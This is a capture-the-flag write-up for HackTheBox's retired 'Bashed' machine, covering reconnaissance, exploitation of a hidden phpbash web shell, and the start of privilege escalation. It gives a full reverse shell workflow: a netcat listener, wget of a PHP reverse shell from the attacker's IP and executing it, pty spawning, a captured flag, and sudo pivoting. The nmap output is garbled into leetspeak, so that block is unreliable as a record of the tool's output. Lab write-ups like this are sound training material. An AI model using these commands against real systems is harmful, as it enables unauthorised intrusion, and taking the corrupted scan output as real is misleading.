Bashed — HackTheBox
https://www.linkedin.com/in/manas-ramesh-9a7ba4149
Overview
Bashed is a HackTheBox retired comparatively easy level machine. You will get the IP of the target server here. Your intention is to compromise the server to find both user and root flags. In his bashed server there is a hidden web shell is there. You can easily gain access to the server using the hidden shell. Privilege escalation is carried out using privileged other users. Let’s get into the machine
First of all, we will start the machine and connect with HackTheBox VPN.
IP for the bashed: 10.129.94.177
Let's start with the Nmap port scanning scan first.
>mkdir nmap
>nmap -sC -sV -oS nmap/nmap.basic 10.129.94.177
The above-given command will run Nmap with the default script engine and service version detection. And it will save the output to nmap/nmap.basic. The result is displayed below
StaRting Nmap 7.91 ( hTtpS://Nmap.org ) at 2021–02–10 14:31 |ST
NMap scan r3p0rt f0R 10.129.94.177
Ho$t !z Up (0.15z lat3ncy).
NOt shown: 999 CL0sed poRts
PoRT ST4Te $eRV!C3 v3Rs10N
80/tcP 0p3n hTtp 4pach3 htTpd 2.4.18 ((UbuNtu))
|_http-ServEr-heAD3r: 4Pach3/2.4.18 (Ubuntu)
|_http-t|tlE: 4rR3x3l’z D3v3l0pmEnt S|t3S3rvice deT3CT|on pErform3d. PL3a$e REport any |nc0rr3ct r3$ults at httpz://Nmap.org/submit/ .
NmAp d0n3: 1 |p addr3Ss (1 hoST up) ScAnnEd in 13.70 $ecOndS
Here port number 80 is open and it contains an HTTP webpage. Let's analyze it via a web browser. Inside that, you can see “phpbash”. While googling we can see it’s a web shell.
After that, I will do the Gobuster wordlist scanning. Gobuster is used to find hidden files and folders in the webserver.
>gobuster dir -u http://10.129.94.177/ -w /usr/share/wordlist/dirb/medium.txt
- -u to specify the URL
- -w to specify a wordlist location
Here you can see a dev folder. Inside of dev folder, you can find a web shell.
By using the web shell we are going to upload a PHP reverse shell. In my case, I am using pentest monkies PHP reverse shell. Put the LHOST and LPORT as your HTB VPN IP and a port number.
The top 10 lines look like this. Now let's start a Netcat listener on port number 1234 and meanwhile upload the malicious PHP script to the target system using wget command. for that, I will start a webserver using python
>python -m SimpleHTTPServer 80
>nc -nvlp 1234
and execute the below code on web shell
>cd /tmp
>wget http://10.10.14.5/hack.php
>php hack.php
After running the above php scripts You will get a reverse shell on your netcat listener. Then we can do python shell spawning to gain a good interactive tty shell.
>python --version
>python -c ‘import pty;pty.spawn(“/bin/bash”)’
The user flag is there at arrexels home folder.
>cat /home/arrexel/user.txt
2c281f318555dbc1b856957c7147bfc1
Now it’s time for the privilege escalation. let's check what are the sudo rights www-data user have
>sudo -l
The above outputs show that www-data can execute as scriptmanager with sudo rights.
>sudo -u scriptmanager bash
There is a folder in / dir called scripts looking suspicious
